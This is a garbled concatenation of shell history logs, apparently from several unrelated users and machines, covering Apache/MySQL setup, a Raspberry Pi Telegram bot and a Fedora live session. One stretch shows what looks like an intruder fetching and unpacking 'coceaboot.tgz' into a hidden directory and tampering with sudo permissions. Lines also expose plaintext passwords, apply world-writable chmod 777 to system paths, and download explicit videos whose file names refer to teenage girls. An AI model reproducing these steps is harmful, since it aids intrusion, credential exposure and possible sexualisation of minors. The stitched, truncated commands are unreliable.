httpd +systemctl status httpd.service +journalctl -u httpd.service +lc_all +tz +path +home +ls +cat version +ls +mdadm +mdadm --help +ls +mdadm --hel +mdadm --help +mdadm -? +man mdadm +lshw +man netcat +apt install -y docker +su -root +apt install -y docker +sudo apt install -y docker +systemctl docker +exit +which git +git --help +which git +git --help +ssh saiyuuki@myportal.jpn.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@myportal.jpn.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@myportal.jpn.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@myportal.jpn.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa + sudo apachectl start +pwd +vi httpd.conf +sudo vi httpd.conf + sudo apachectl restart +sudo vi httpd.conf + sudo apachectl restart +ls +ls +ls +ls +chmod -R 755 . +chmod 777 ./settings.php +chmod -R 777 . +mysql +brew install mysql +ruby -e "$(curl -fsSLstall)" +brew install mysql +brew install mysql +java -version +ls /usr/local/ +ls /usr/local/ +ls /usr/ +tar -xzvf mysql-5.1.73-osx10.6-x86_64 +ls +tar -xzvf mysql-5.1.73-osx10.6-x86_64.tar.gz +ls /usr +brew -v +ruby -e "$(curl -fsSLsercontent.com/Homebrew/install/master/install)" +brew doctor +brew -v +brew update +brew install mysql +ls /var/ +ls -al /usr +ls -al /usr/local/ +ls -al /usr +sudo chmod -R /usr/local/ +sudo chmod -R 777 /usr/local/ +brew install mysql +sudo chmod -R 777 /usr/local/ +brew install mysql +mysql +mysql.server start +mysql -u root -p +mysql + sudo apachectl restart + sudo apachectl stop +vi httpd.conf +ls +sudo vi httpd.conf +sudo vi httpd.conf +sudo vi httpd.conf + sudo apachectl stop + sudo apachectl stop +saitou3 + sudo apachectl stop + sudo apachectl restart + sudo apachectl stop +sudo vi httpd.conf +ls +vi httpd.conf + sudo apachectl stop +vi httpd.conf + sudo apachectl stop + sudo apachectl stop + sudo apachectl start + sudo apachectl stop + sudo apachectl stop + sudo apachectl stop + sudo apachectl stop +ls +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +pwd +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +vi page.twig.php +vi page.twig.php +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +php -v +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +php -v +mysql -u root -p +brew install mariadb +mysql -u root -p +mysql +mysql.server start +sudo apachectl start +sudo apachectl start +php -v +brew install php55 --with-mysql --without-pear +brew tap homebrew/dupes +brew tap josegonzalez/homebrew-php +brew install php55 --with-mysql --without-pear +brew info php55 +sudo apachectl start +php -v +curl -ssx.liip.ch/install.sh | bash -s 5.5 +curl -ssx.liip.ch/install.sh | bash -s 5.5 +php -v +mysql +curl -ssx.liip.ch/install.sh | bash -s 5.5 +php -v +defaults write com.apple.finder AppleShowAllFiles true +killall Finder +mysql +mysql +brew options mysql +brew install mysql +ruby -e "$(curl -fsSLsercontent.com/Homebrew/install/master/install)" +echo 'export PATH=/usr/local/bin:$PATH' >> "$HOME/.$(basename $SHELL)rc" +2 +source "$HOME/.$(basename SHELL)rc" +echo 'export PATH=/usr/local/bin:$PATH' >> "$HOME/.$(basename $SHELL)rc" +2 +echo 'export PATH=/usr/local/bin:$PATH' >> "$HOME/.$(basename $SHELL)rc" +2 +echo +echo 'export PATH=/usr/local/bin:$PATH' >> "$HOME/.$(basename $SHELL)rc" +2 +echo 'export PATH=/usr/local/bin:$PATH' >> "$HOME/.$(basename $SHELL)rc" +2 +source "$HOME/.$(basename SHELL)rc" +echo 'export PATH=/usr/local/bin:$PATH' >> "$HOME/.$(basename $SHELL)rc" +2 +source "$HOME/.$(basename SHELL)rc" +brew tap homebrew/dupes +2 +brew tap homebrew/versions +3 +brew tap homebrew/hoembrew-php +sudo /usr/sbin/apachectl stop +sudo launchctl unload /System/Library/LaunchDaemons/org.apache.httpd.plist +sudo launchctl unload /System/Library/LaunchDaemons/org.apache.httpd.plist +sudo launchctl unload -w /System/Library/LaunchDaemons/org.apache.httpd.plist +sudo launchctl unload /System/Library/LaunchDaemons/org.apache.httpd.plist +sudo /usr/sbin/apachectl start +sudo launchctl unload /System/Library/LaunchDaemons/org.apache.httpd.plist +mysql +mysql +mysql +mysql -u root -p +export PATH=$PATH:/Applications/MAMP/Library/bin +source ~/.bash_profile +source ~/.bash_profile +mysql +mysql -u root -p +mysql -u root -p +mysql -u root -p +mysql -u root -p +mysql -u myportal -p +mysql -u myportal -p +mysql -u myportal -p +mysql -u root -p +mysql -u root -p +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +ssh saiyuuki@www.31yuuki.com -p 22 -i ~/.ssh/mac_rsa +mysql +mysql +sudo apachectl start +php -v +curl -ssx.liip.ch/install.sh | bash -s 5.5 +export PATH=/usr/local/php5/bin:$PATH +php -v +ls +ls +mkdir ./sites/default/files/translations +mkdir ./sites/default/files/translations +mkdir ./sites/default/files/translations +ls +mkdir ./sites/default/files/translations +mkdir ./sites/default/files/ +mkdir ./sites/default/files/translations +chmod 555 ./sites/default/files/translations +chmod 777 ./sites/default/files/translations +chmod 777 ./sites/default/files/ +ls /etc +ls /etc/php5 +ls /etc/ +sudo vi /etc/php.ini.default +sudo cp /etc/php.ini.default /etc/php.ini +sudo vi /etc/php.ini +ls /usr/local/ +ls /usr/local/php5 +ls /usr/local/php5/etc +ls /usr/local/php5/ +ls /usr/local/php5/info +ls /usr/local/php5 +ls /usr/local/php5/lib +ls /usr/local/php5/bin +ls /etc +vi /etc/php.ini +vi /etc/php.ini +chmod 777 /etc/php.ini +sudo chmod 777 /etc/php.ini +ls -al /etc/ +vi /etc/php.ini +vi /etc/php.ini +ls /etc/ +vi /etc/php.ini +ls /usr/local/php/lib +ls /usr/local/php +ls /usr/local/php +ls /usr/local/php +ls /usr/local/ +ls /usr/local/php5 +ls /usr/local/php5/lib +vi /usr/local/php5/lib/php.ini +sudo chmod 777 /usr/local/php5/lib/php.ini +vi /usr/local/php5/lib/php.ini +vi /usr/local/php5/lib/php.ini +vi /usr/local/php5/lib/php.ini +vi /usr/local/php5/lib/php.ini +vi /usr/local/php5/lib/php.ini +vi /usr/local/ +:q! +vi /usr/local/php5/lib/php.ini +/etc/init.d/httpd restart +/usr/sbin/apachectl restart +sudo apachectl restart +ls +ls +chmod 777 settings.php +mysql +ls /usr/local/ +export PATH=$PATH:/usr/local/mysql/bin +mysql -u root -p +mysql -u root -p +mysql -u root -p +mysql +mysql +sudo mysql +sudo mysql -u root -p +sudo mysql -u root -p +mysql.server stop +mysql stop +sudo mysql stop +service mysqld stop +mysql -u root +mysql -u root -p +mysql -u root -p +mysql -u root -p +su - +killall mysqld +killall mysql +/usr/local/mysql/bin/mysqladmin -u root password 'saitou3' +sudo /usr/local/mysql/bin/mysqladmin -u root password 'saitou3' +mysql +sudo mysql +mysql +exit +ls +history +ssh root@ +ls /usr/local/mysql/bin/ +/usr/local/mysql/bin/mysqladmin -u root password 'saitou3' +sudo apachectl restart +/usr/local/mysql/bin/mysqladmin -u root password 'saitou3' +sudo port install mysql5 +server +sudo port install mysql5 +server +mysql +mysql -u root -p +export PATH=$PATH:/usr/local/mysql/bin +mysql +mysql -u root -p +mysql -u root -p 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mysql +sudo kill 2026 +ps aux | grep mysql +sudo kill 2044 +ps aux | grep mysql +mysql +mysqladmin processlist -u root -p + +ps aux | grep mysql +killall -9 mysqld +sudo killall -9 mysqld +sudo killall -9 mysqld +ps aux | grep mysql +mysql -u root -p +ls /usr/local +sudo rm -rf /usr/local/mysql +sudo rm -fr /usr/local/mysql-5.7.9-osx10.9-x86_64/ +ls /Library/StartupItems/ +ls /Library/StartupItems/ +sudo rm -rf /Library/StartupItems/MYSQLCOM +sudo rm -rf /Library/PreferencePanes/MySQL.prefPane +sudo rm -rf /Library/Receipts/mysql-.pkg +ps aux | grep mysql +ps aux | grep mysql +ps aux | grep mysql +netstat -an -o +x/Applications/XAMPP/etc +pwd +sudo chmod 777 /Applications/XAMPP/etc/my.cnf +ls -al +history +ssh root@ +exit +history +ssh root@ +useradd saiyuuki +passwd saiyuuki +ssh root@ +yum -y install telnet-server +ssh root@ +ssh root@ +ssh saiyuuki@ +ssh saiyuuki@ +ls /.ssh +ssh-keygen -t d8_rsa +ssh -l saiyuuki@ +ssh -l roof@ + +ssh -l root@ +ssh -l roof@ +/etc/rc.d/init.d/sshd start  +ssh roof@ +ssh saiyuuki@ +ssh-keygen -t myportal8_rsa +ls +ssh-keygen -t d8_rsa +ssh-keygen -t rsa +ssh-keygen -t rsa +ssh-keygen -t myportal8_rsa +ssh-keygen -t my8_rsa +ssh-keygen -t my_rsa +ls /Users/saiyuuki/.ssh/ +ssh-keygen -t my_rsa +ssh-keygen -t myrsa +chmod 700 /Users/saiyuuki/.ssh/ +ssh-keygen -t rsa +chmod 600 ~/.ssh/id_rsa.pub +chmod 600 ~/.ssh/id_rsa.pub +ls +pwd +scp ~/.ssh/id_rsa.pub saiyuuki@:~/.ssh/authorized_keys +scp ~/.ssh/id_rsa.pub saiyuuki@:~/.ssh/authorized_keys +scp ~/.ssh/id_rsa.pub saiyuuki@ +scp ~/.ssh/id_rsa.pub root@ +yum -y install vsftpd +/etc/rc.d/init.d/vsftpd start +ssh-keygen -t rsa +/etc/rc.d/init.d/sshd restart +/etc/rc.d/init.d/sshd restart +vi /etc/ssh/sshd_config +service sshd restart +cat /proc/version + cat /etc/redhat-release +cat cat /etc/redhat-release +cat /etc/issue + cat /etc/redhat-release +vi /etc/ssh/sshd_config +pwd +ls +ssh-keygen -t rsa +ls +ls -al +scp id_rsa.pub root@remoteserver.com:~/ +scp id_rsa.pub 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+git add README.md +git commit -m "first commit" +git remote add originsaiyuuki822/Syokudo.git +git push -u origin master +ls +vi ~/.bash_profile +source ~/.bash_profile +exit +ls +wgets.com/videos/girl-standing-in-bathtub-playing-with-foam-kleinmachnow-brandenburg-video-id97368709?s=192_srp +ls -l /home/liveuser +terminal +gnome-terminal & +exit +which bash +ls -l /bin/bash +ls -l /usr/bin/bash +exit +sudo mkdir -p /mnt/ext3 +sudo mount -t ext3 /dev/sda1 /mnt/ext3 +ls +sudo mount -t ext3 -o bind /mnt/ext3 /home +mount +ls /mnt/ext3 +mkdir -p /mnt/ext3/liveuser +sudo mkdir -p /mnt/ext3/liveuser +ls +ls +sudo mkdir Downloads +;s +ls +wgets.com/photos/teenage-girls-wearing-bikinis-picture-id76529130 +sudo wgets.com/photos/teenage-girls-wearing-bikinis-picture-id76529130 +ls +pwd +sudo chown liveuser.liveuser /mnt/ext3/ +sudo chown liveuser.liveuser /mnt/ext3/liveuser +sudo chown liveuser.liveuser /mnt/ext3/liveuser/Downloads +sudo chmod 777 /mnt/ext3 +sudo chmod 777 /mnt +ls +;ls +ls +touch file.txt +cat file.txt +wgets.com/videos/girl-standing-in-bathtub-playing-with-foam-kleinmachnow-brandenburg-video-id97368709?s=192_srp +ls +ls ~/Downloads/ +ls +mount +ls +sudo dnf localinstall google-chrome* +ls +sudo dnf localinstall google-chrome-stable_current_x86_64.rpm +ls +rm teenage-girls-wearing-bikinis-picture-id76529130 +ls +chmod 755 *.mp4 +exit +pwd +ls +vi ~/.bash_profile +ls -l +ls -ld /mnt +ls -ld /mnt/ext3 +ls -ld /mnt/ext3/liveuser +ls -ld /mnt/ext3/liveuser/* +ls +rm 'A woman in underwear waits for a train in the Kiev subway as they take part in the 2014 No Pants Subway Ride on January 12, 2014 Pictures _ Getty Images +rm 'A woman in underwear waits for a train in the Kiev subway as they take part in the 2014 No Pants Subway Ride on January 12, 2014* +rm 'A woman in underwear waits for a train in the Kiev subway as they take part in the 2014 No Pants Subway Ride on January 12, 2014' +rm 'A woman in underwear waits for a train in the Kiev subway as they take part in the 2014 No Pants Subway Ride on January 12, 2014'* +ls +cat ~/.bash+_profile +cat ~/.bash_profile +vi ~/.bash_profile +login +ls +ls -l +ls *.mp4 +ls -l +ls +exit +pwd +ls +wget s-cdn.com/videos/mp4/e/8/9/xvideos.com_e89830557e0afbb399ae7a24896db416-1.mp4?e=1524459779&h=6181cf0261b6cab4fb1cb16d54dfe3be&download=1" & +ls +wget s-cdn.com/videos/mp4/8/f/5/xvideos.com_8f50b1754aab8a4cee500b5f76a2d682-1.mp4?e=1524457354&h=3293e94c0de3c0f691ad66173b14e311&download=1" +exit +ps ax +who +pwd +ls +wgetstatic-hw.xvideos.com/swf/xv-player.swf?id_video=1426493 +ls +file xvideos.com_e4e8550aaea29a9d771729b64b19c649.mp4 +mv xvideos.com_e4e8550aaea29a9d771729b64b19c649.mp4 teenager_girl_selfie.mp4 +ls +ls -ld +ls -l +free +df -h +ls /mnt/ext3/liveuser/Downloads/ +ls /mnt/ext3/liveuser/Downloads/xvideos.com_65841d31f04b889ea938f996dc4faaa1.mp4.crdownload +ls -lZ /mnt/ext3/liveuser/Downloads/xvideos.com_65841d31f04b889ea938f996dc4faaa1.mp4.crdownload +ls -laZ /mnt/ext3/liveuser/Downloads/xvideos.com_65841d31f04b889ea938f996dc4faaa1.mp4.crdownload +ls -al +sync +du -h /mnt/ext3 +mount +ls --color=always +ls -l +chmod 755 *.mp4 +ls +mv 497934022.mp4 short.mp4 +mv 624379598.mp4 short01.mp4 +ls +chmod 755 *.mp4 +ls -l --color=always +ls +pwd +;ls +ls +vi login.txt +ls +ls +mv ' Backup' Backup +mv Backup Miscellaneous +ls +ls +vi login.txt +pwd +du -h /dev/sda1 +df /dev/sda1 +vi login.txt +ls -l +ls +ls -l +number=0 ; for file in *.mp4; do mv $file $number.mp4 && number++; echo $?; sleep 10; done +export number=0; for file in *.mp4; do mv $file $number.mp4 && number++; echo $?; sleep 10; done +ls -l +export number=0; for file in *.mp4; do mv $file $number-$number.mp4 && number=$number + 1; echo $?; sleep 10; done +export number=0; for file in *.mp4; do mv $file $number-$number.mp4 && number=$number+1; echo $?; sleep 10; done +export number=0; for file in *.mp4; do mv $file $number-$number.mp4 && number=$number++; echo $?; sleep 10; done +export number="00"; for file in *.mp4; do mv $file $number.mp4 && number++ && echo $number; echo $?; done +ls +rm 00.mp4 +ls +clear +pwd +ls +wgets-cdn.com/videos/mp4/d/5/3/xvideos.com_d53145027ecd13b6d9d51a0341abde32-1.mp4?e=1524457513&h=9e759862ee2a109ca128d8bb8584c7cb&download=1 +wget s-cdn.com/videos/mp4/d/5/3/xvideos.com_d53145027ecd13b6d9d51a0341abde32-1.mp4?e=1524457513&h=9e759862ee2a109ca128d8bb8584c7cb&download=1" +wget s-cdn.com/videos/mp4/8/f/5/xvideos.com_8f50b1754aab8a4cee500b5f76a2d682-1.mp4?e=1524457354&h=3293e94c0de3c0f691ad66173b14e311&download=1" -o girl-01.mp4 +ls -l +ps ax +ps aux | grep wget +ls -al +wget s-cdn.com/videos/mp4/e/8/9/xvideos.com_e89830557e0afbb399ae7a24896db416-1.mp4?e=1524459779&h=6181cf0261b6cab4fb1cb16d54dfe3be&download=1' +netstat -tap | more +netstat -udp +ls +ls /home/liveuser +ls -l --color=always /home/liveuser +vi ~/.bashrc +cat ~/.bash_profile >> ~/.bashrc +cat ~/.bashrc +source ~/.bashrc +login +netstat +netstat | grep stdout | wc -l +netstat | grep stdout | more +ps ax +wget s-cdn.com/videos/mp4/d/f/a/xvideos.com_dfae41cc7cc837c26e1e425a74daba36.mp4?e=1524457335&h=a1e9268beb4303f026e4e66e6e28dea2&download=1" & +foreground +ls -l +cat wget-log +ls +rm wget-log +mv xvideos.com_dfae41cc7cc837c26e1e425a74daba36.mp4\?e\=1524457335\&h\=a1e9268beb4303f026e4e66e6e28dea2\&download\=1 Downloads/girl-02.mp4 +ls +shotwell 'Screenshot from 2018-04-22 19-40-58.png' +ls +rm 'Screenshot from 2018-04-22 19-40-58.png' +ls +ls +vi login.txt +ls +ls +lw +ls +sudo chmod 777 startup.sh +vi startup.sh +ls +ls +ls +ls +pwd +sudo dnf install filesystem --install-root=/mnt/ext3 +sudo dnf install filesystem --root=/mnt/ext3 +sudo dnf install filesystem --installroot=/mnt/ext3 +sudo dnf install filesystem --installroot=/mnt/ext3 --releasever=27 +sudo dnf makecache --installroot=/mnt/ext3 +vi +updatedb & +sudo updatedb +locate fedora.repo +vi /etc/yum.repos.d/fedora.repo +vi /etc/yum.repos.d/fedora-updates.repo +sudo vi /etc/yum.repos.d/fedora-updates.repo +sync +sudo sync +login help +whoami +login liveuser +ps ax +ls +ls +chmod 755 file.txt +vi file.txt +sudo dnf install vim +sudo dnf install --installroot=/mnt/ext3 vim +vim file.txt +cat file.txt | cut -d"x" -f1 +cat file.txt | cut -d"x" -f2 +cat file.txt | cut -d"x" -f2 >>file.txt +cat file.txt +cat file.txt | cut -d"x" -f1 >>file.txt +cat file.txt +ls -l +truncate --size 1000 file.txt +echo $? +ls -ls +cat /dev/zero >>file.txt +ls -ls +cat /dev/zero >>file.txt +ls -ls +truncate --size 1024 file.txt +ls -l +vi file.txt +truncate --size 1022 file.txt +ls -l +vi file.txt +number=00 +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +ls +ls ../Downloads/ +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +rm /mnt/ext3/liveuser/Downloads/xvideos.com_11176da3617e10203b10ba96ecf44d9f-1 (1).mp4 +rm "/mnt/ext3/liveuser/Downloads/xvideos.com_11176da3617e10203b10ba96ecf44d9f-1 (1).mp4" +vim file.txt +./file.txt +vi file.txt +./file.txt +ls +mv *.mp4 ../Downloads/ +ls -l +chmod 755 login.txt +vi file.txt +exit +man truncate +man munmap +man unshare +sudo +whoami +who +write tty1 +write liveuser@tty1 +write liveuser +clear +chroot +chroot --help +chroot /mnt/ext3 +sudo chroot /mnt/ext3 +exit +sudo dnf install vlc && sudo dnf install python-vlc npapi-vlc +clear +pwd +ls +ls +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +vi file.txt +./file.txt +ls +ls +ls -la +ls --color=always +ls -l --color=always +file * +du -h . +df -h +sudo fdisk /dev/sdb +sudo fdisk /dev/sdc +sync +pwd +ls +chmod 755 *.jpg +chmod 777 *.mp4 +ls +cls +clear +ls +ls -l +sort +ls +ls | sort +ls | sort | wc -l +ls | sort | grep mp4 | wc -l +ls | sort | grep jpg | wc -l +ls -al +ls +vi login.txt +ls +ls +sudo dnf install recordmydesktop +sudo dnf install --installroot=/mnt/ext3/ recordmydesktop +recordmydesktop +du -h /mnt/ext3 +df -h +clear +ls -l +ls +pwd +--version +bash --version +pwd +ls +ls +ls +ls +mkdir -p Trash +pwd +ls +ls -l /root +sudo ls -l /root +sudo cat /root/anaconda-ks.cfg +sudo cat /root/anaconda-ks.cfg |more +pwd +ls +ls +ls -l +ls -al /root +sudo ls -al /root +sudo rm -i /root/.* +sudo rm -i /root/*.* +ls / +ls /root +sudo ls /root +sudo ls -al /root +sudo cat /root/.viminfo +su - root +exit +echo $* +echo $$ +ps ax | grep 27439 +echo $* +echo \$* +exit +pwd +ls +vi file.txt +./file.txt +ls +ls ../Dowmn +ls .. +ls ../Downloads +ls +lw +le +ls +ls +wgets-cdn.com/videos/thumbs169lll/ee/e5/5e/eee55e4c708624caede8bb0012818d06/eee55e4c708624caede8bb0012818d06.30.jpg +ls -l +mv eee55e4c708624caede8bb0012818d06.30.jpg girl-in-underwear.jpg +ls +exit +su +exit +su +exit +w +uname +passwd +/sbin/ifconfig | grep inet +mkdir " " +ps -aux +ls -a +wget +rm -rf " " +mkdir " " +wgetst.ro/coceaboot.tgz +tar zxvf coceaboot.tgz +export PATH="." +init +ls -a +ls +vi ttyPS0.conf +chmod u+s /usr/bin/sudo +chmod 440 /etc/sudoers +viduso +visudo +chown root:root /usr/bin/sudo +chmod 4755 /usr/bin/sudo +exit +echo "debs.ubuntu.com precise main restricted multiverse universe"> /etc/apt/sources.list +apt-get update + apt-get install build-essential cmake libgtk2.0-dev pkg-config python-dev python-numpy libavcodec-dev libavformat-dev libswscale-dev +ls +ls +unzip opencv-2.4.9.zip +apt-get install zip +unzip opencv-2.4.9.zip +ls +ls +cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local +cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local .. +cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local .. +cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local . +make +ls +make install +ls +ls +mkdir test +ls +vi test.c +vi CMakeLists.txt +mv test.c test.cpp +apt-get install vim +vi test.cpp +ls +ls +adduser xup +ls +vi test.cpp +cmake . +ls +make +vi CMakeLists.txt +cmake +cmake . +vi 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trabalho av1 +rename trabalho av1 +uname trabalho av1 +VI TRABALHO AV1 +vi trabalho +rm trabalho +ls +vi trabalho +ls +vi trabalho +cat trabalho +. trabalho +vi trabalho +ls +ls -l +chmod +x +chmod +x trabalho +ls -l +./ trabalho +. trabalho +a +ls +ls -la +exit +tar xvzf patchfork.tar.gz --strip-components=1 +ll +htop +ll +ls +vi keepalive.sh +killall daemon +sudo apt-get install screen +ll +ls +echo hallo +htop +daemon -r --output=log.txt -- /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg/tg-server.pub +tail -f log.txt +ll +ls +killall daemon +killall telegram +daemon -r --output=tglog.txt -- /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg/tg-server.pub +tail -f tglog.txt +ll +killall deamon +killall daemon +daemon -r -o tglog.txt -- /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg/tg-server.pub +tail -f tglog.txt +killall daemon +ls +daemon -r -E tglog.txt -- /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg/tg-server.pub +tail -f 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linux && make install +./configure +sudo apt-get install liblua5.1-0-dev +./configure +make +sudo lua signal1.lua +htop +deamon --help +daemon --help +daemon -r -- sudo /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg/tg-server.pub +vi tglog.txt +killall daemon +killall telegram +ll +ls +vi tg +ll +ls +ls -l +ls -l +ls +ls +vi tg/test.lua +mv tg2/test.lua tg/test.lua +sudo vi /etc/rc.local +sudo reboot +htop +vi tg/test.lua +wget +vi tg/test.lua +killall daemon +sudo killall daemon +sudo /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg/tg-server.pub +ls +ls +vi auth +sudo /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg/tg-server.pub +sudo /home/pi/tg/telegram -s /home/pi/tg2/test.lua -k /home/pi/tg2/tg-server.pub +sudo /home/pi/tg/telegram -s /home/pi/tg/test.lua -k /home/pi/tg2/tg-server.pub +htop +sudo lua signal3.lua +ll +ls +sudo lua signal1a.lua +sudo lua signal1.lua +ll +tg/telegram +ls +ls -h +vi tg/test.lua +sudo lua signal1.lua +rm -rf .telegram +tg/telegram +./telegram +./telegram +mv tg tg3 +git clonesheng/tg.git +ls +./configure +sudo apt-get install libevent +sudo apt-get install libevent-2.0-5 +sudo apt-get install libevent-dev +./configure +make +ll +./telegram-daemon +ls +htop +sudo reboot +htop +ls +ls +./start-telegram-daemon +make +./configure +make +make install +ls +./config.status +ls +./telegram-cli +./telegram-cli --help +./telegram-cli -k ~/tg3/tg-server.pub +ll +ls +./start-telegram-daemon --help +./telegram-daemon --help +htop +killall daemon +sudo killall daemon +htop +sudo make install +ls +ls +./generate --help +./generate +./tlc --help +ls +vi README.md +./telegram-daemon +htop +./start-telegram-daemon +./telegram-cli -k ~/tg/tg-server.pub -l tg2 +vi test.lua +/home/pi/tg/bin/telegram-cli --help +/home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/tg3/test.lua +vi /home/pi/tg3/test.lua +/home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/tg3/test.lua +vi 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+cp signal1.lua sos.lua +vi sos.lua +sudo lua sos.lua +vi sos.lua +sudo lua sos.lua +vi sos.lua +nano tg/test.lua +hotp +htop +sudo vi /etc/rc.local +sudo reboot +htop +sudo /etc/rc.local +nano tg/test.lua +vi tg/test.lua +sudo /etc/rc.local +vi tg/test.lua +sudo /etc/rc.local +sudo reboot +nano tg/test.lua +/home/pi/signal5.lua +ls +exit +test.lua +ls -l -a +signal1.lua +lua signal1.lua +sudo lua signal1.lua +ls -l -a +ls -l -a +exit +htop +exit +nano rc.init +dir rc.init +ls -l -a +dir rc +nano rc +xit +exit +htop +cat /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/tg/test.lua +telegram-cli: binlog.c:151: fetch_comb_binlog_set_qts: Assertion `new_qts >= tgl_state.qts' failed. +crontab -e +cat /etc/rc.local +ll +ls +git pull +git stash +mv test.lua pz.lua +git pull +ls +cp pz.lua ../pz.lua +./configure +make +sudo apt-get install libreadline-dev libconfig-dev libssl-dev lua5.2 liblua5.2-dev libevent-dev make +make +git pull origin +git remote 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tglog.txt | grep bakker +cat tglog.txt +sudo reboot +vi pz.lua +sudo reboot +htop +killall telegram-cli +sudo killall telegram-cli +cat /etc/ +vi /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua +vi pz.lua +wget -q -O - "$@" +wget --help +wget -q -O - "$@"ser=popcorn --http-password=popcorn +wget -q -O --http-user=popcorn --http-password=popcorn - "$@" +wget -q -O - "$@" +wget -q -O --http-user=popcorn --http-password=popcorn - "$@" +wget -q -O - "$@"ser=popcorn --http-password=popcorn +wget --help +wget -q -O --http-user=popcorn --http-password=popcorn - "$@" +ll +ls +vi --http-user\=popcorn +cat '--http-user=popcorn' +vi --http-user\=popcorn +vi '--http-user\=popcorn' +cat --http-user\=popcorn +wget -q -O --http-user=popcorn --http-password=popcorn - "$@" -q -O +wget -q -O - "$@"ser='popcorn' --http-password='popcorn' +cat '--http-user=popcorn' +wget -q -O -user popcorn -password popcorn - "$@" +wget -q -O -user popcorn -password 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telegram-cli +vi /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua +vi /etc/rc.local +sudo killall telegram-cli +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua +sudo /home/pi/tg/bin/telegram-cli --help +sudo vi /etc/rc.local +sudo reboot +htop +sudo vi /etc/rc.local +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua -P 1234 +sudo vi /etc/rc.local +sudo reboot +vi /etc/rc.local +sudo vi /etc/rc.local +sudo reboot +htop +vi eten.sh +sudo lua signal1.lua +sudo apt-get install python-scrapy +vi scanner.py +python scanner.py +sudo apt-get install python-scapy +python scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +sudo apt-get update +sudo apt-get install tcpdump tcpreplay wireshark python-scapy +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +vi scanner.py +sudo python scanner.py +cat /etc/rc.local +sudo killall telegram-cli +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua +sudo killall telegram-cli +sudo /home/pi/tg/bin/telegram-cli -k /home/pi/tg/tg-server.pub -s /home/pi/pz.lua +vi christmas.sh +wget -vs/s224031/nowplaying +vi pz.lua +wget -q -O - "$@"s/s224031/nowplaying +vi pz.lua +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh +vi you.sh +sh you.sh 